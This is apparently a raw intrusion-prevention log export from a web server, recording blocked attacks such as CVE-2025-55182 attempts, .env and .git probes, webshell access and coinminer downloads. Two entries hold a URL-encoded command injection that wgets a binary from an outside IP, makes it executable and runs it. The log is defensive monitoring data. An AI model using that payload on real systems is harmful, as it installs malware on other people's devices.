						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000403	01dc94991f86cbfc	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc9498fa2888d9	01dc9498fa2888d9	00000001	00000158	[SID: 35300] Web Attack: Meta React Server Components CVE-2025-55182 2 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkZBMjc5QzI1LTk0OTgtMTFGMS1COTQ0LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUzMDAsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIDIiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089e4	00010000	00000002	00000002	000033ae	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182 2	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fb	01dc94991f86cbfc	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc9498fa2aeafe	01dc9498fa2aeafe	00000001	00000154	[SID: 35256] Web Attack: Meta React Server Components CVE-2025-55182 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkZBMjc5QzI0LTk0OTgtMTFGMS1COTQ0LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUyNTYsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000089b8	00010001	00000002	00000002	000033ae	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a3	01dc94991f86cbfc	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc9498fa2aeafe	01dc9498fa2aeafe	00000001	0000011c	[SID: 35273] Web Attack: Malicious Payload Upload 40 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkZBMjc5QzIzLTk0OTgtMTFGMS1COTQ0LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzUyNzMsIm5hbWUiOiJXZWIgQXR0YWNrOiBNYWxpY2lvdXMgUGF5bG9hZCBVcGxvYWQgNDAiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089c9	00010002	00000002	00000002	000033ae	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Malicious Payload Upload 40	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a8	01dc94993a17836e	000000ce	0000000f	164a8367	f70a942d	00000002	00000002	00000001	01dc94991529e358	01dc94991529e358	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjE1MjkxRUUxLTk0OTktMTFGMS1CMjk4LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00008c5e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://vinhhungoldtownhotel.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc9499c25e1aba	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc94999e97c5de	01dc94999e97c5de	00000001	00000000	Active Response that started at 2/3/2026 6:04:01 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
0000039d	01dc9499f43e45d3	000000ce	0000000f	164a8367	6d6eb2c3	00000002	00000002	00000001	01dc9499cd552381	01dc9499cd552381	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNENTFGQ0QwLTk0OTktMTFGMS1BMUQ1LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00002b70	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://itdevpath.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000217	01dc949a8671b47d	000000d3	0000000f	164a8367	d1938ec1	00000001	00000000	00000000	01dc949a60bede82	01dc949a60bede82	00000001	00000000	Active Response that started at 2/3/2026 6:09:27 AM is disengaged. The traffic from IP address 193.142.147.209 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
0000038e	01dc949acf8f3770	000000ce	0000000f	164a8367	82c9be04	00000002	00000002	00000001	01dc949aaa989b8e	01dc949aaa989b8e	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFBOTU3NjlFLTk0OUEtMTFGMS04Q0EzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	00001eda	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://ns.namchauduynhat.vn/shell.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000388	01dc949bf3fa439c	000000ce	0000000f	164a8367	c6589ad9	00000002	00000002	00000001	01dc949bd00188bf	01dc949bd00188bf	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQwMDBCNDQwLTk0OUItMTFGMS04OUI0LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000d272	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://teslateq.vn/userfuns.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000210	01dc949c2c743eca	000000cf	00000007	164a8367	4cb95a4d	00000001	00000000	00000001	01dc949c29401209	01dc949d8ee0ce09	00000001	00000000	The client will block traffic from IP address 77.90.185.76 for the next 600 seconds (from 2/3/2026 6:32:14 AM to 2/3/2026 6:42:14 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000400	01dc949c4da5f607	000000ce	00000003	164a8367	4cb95a4d	00000002	00000001	00000001	01dc949c2931c525	01dc949c2931c525	00000001	00000158	[SID: 35300] Web Attack: Meta React Server Components CVE-2025-55182 2 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjI5MzFBMEE0LTk0OUMtMTFGMS1BRjFDLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUzMDAsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIDIiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089e4	00010000	00000002	00000002	0000b596	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182 2	http://103.131.74.22/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b5	01dc949c5ae5d386	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc949c36f49322	01dc949c36f49322	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjM2RjE0M0Y5LTk0OUMtMTFGMS1BMkUxLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000938f	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ledx-light.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc949c96c598d1	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc949c94d0e93a	01dc949dfa71a53a	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 6:35:14 AM to 2/3/2026 6:45:14 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003bc	01dc949cb4a8c9dd	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc949c8f62e2f8	01dc949c8f62e2f8	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhGNUY5NDQ0LTk0OUMtMTFGMS1COUY4LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00003621	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://hondaotodongthap5s.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000db9	01dc949cbb4f2cfd	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc949c94849d51	01dc949c94849d51	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQ1MTQwLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDc0OTY3NTUzLCJ1aWQiOiIzQzQ1NEQ2Ri0wMDdFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI5NDgxQTlCNi05NDlDLTExRjEtQkExRi0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG1hMTUxM2UyMi0zMzFjLTQ0NDgtYjExZS00OGMxNmVlYWJiNTYgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoxODY4OCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA2NzYwNjc4MSwidWlkIjoiQjFDMkQ0MDctMDA3RC1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000da2b	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770075309.8417379856109619140625			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000214	01dc949db48c02e3	000000d3	0000000f	164a8367	4cb95a4d	00000001	00000000	00000000	01dc949d8f97a8f2	01dc949d8f97a8f2	00000001	00000000	Active Response that started at 2/3/2026 6:32:14 AM is disengaged. The traffic from IP address 77.90.185.76 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000215	01dc949e1ee0ac1a	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc949dfb172b83	01dc949dfb172b83	00000001	00000000	Active Response that started at 2/3/2026 6:35:14 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
0000038e	01dc949e614ffc2a	000000ce	0000000f	164a8367	546b84d4	00000002	00000002	00000001	01dc949e3a84f4cc	01dc949e3a84f4cc	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjNBODREMDQ0LTk0OUUtMTFGMS04RDFGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000e169	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://toyota-tanphu.com/userfuns.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc949f61116957	000000cf	00000007	164a8367	b15ce05b	00000001	00000000	00000001	01dc949f5fe76326	01dc94a0c5881f26	00000001	00000000	The client will block traffic from IP address 91.224.92.177 for the next 600 seconds (from 2/3/2026 6:55:14 AM to 2/3/2026 7:05:14 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000461	01dc949f85a1db70	000000ce	00000003	164a8367	b15ce05b	00000002	00000001	00000001	01dc949f5f5d1881	01dc949f5f5d1881	00000001	0000011c	[SID: 30764] Web Attack: Remote OS Command Injection attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjVGNTM2QzQ4LTk0OUYtMTFGMS05N0VGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3NjQsIm5hbWUiOiJXZWIgQXR0YWNrOiBSZW1vdGUgT1MgQ29tbWFuZCBJbmplY3Rpb24iLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		0000782c	0001007c	00000002	00000002	0000d53c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Remote OS Command Injection	http://103.131.74.22:80/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F94.156.152.67%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20arm7			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000043f	01dc949f85a1db70	000000ce	0000000f	164a8367	b15ce05b	00000002	00000002	00000001	01dc949f5f5f7abf	01dc949f5f5f7abf	00000001	00000114	[SID: 33635] Audit: Suspicious Scan Attempt 4 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjVGNTM2QzQ2LTk0OUYtMTFGMS05N0VGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM2MzUsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008363	00010002	00000002	00000002	0000d53c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 4	http://103.131.74.22:80/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F94.156.152.67%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20arm7			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc949f8c446d42	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc949f896878cd	01dc94a0ef0934cd	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 6:56:24 AM to 2/3/2026 7:06:24 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc949fad791449	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc949f8917688a	01dc949f8917688a	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjI1MDQ4LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDc2MDA1NDIwLCJ1aWQiOiIzQzQ1NEZCMi0wMDdFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI4OTE2ODczQi05NDlGLTExRjEtQjk3My0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG1kMTBmZTM2Zi1lZjBiLTRjYzctOWE1Ny1mMGFmYmVhMWM0NTcgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU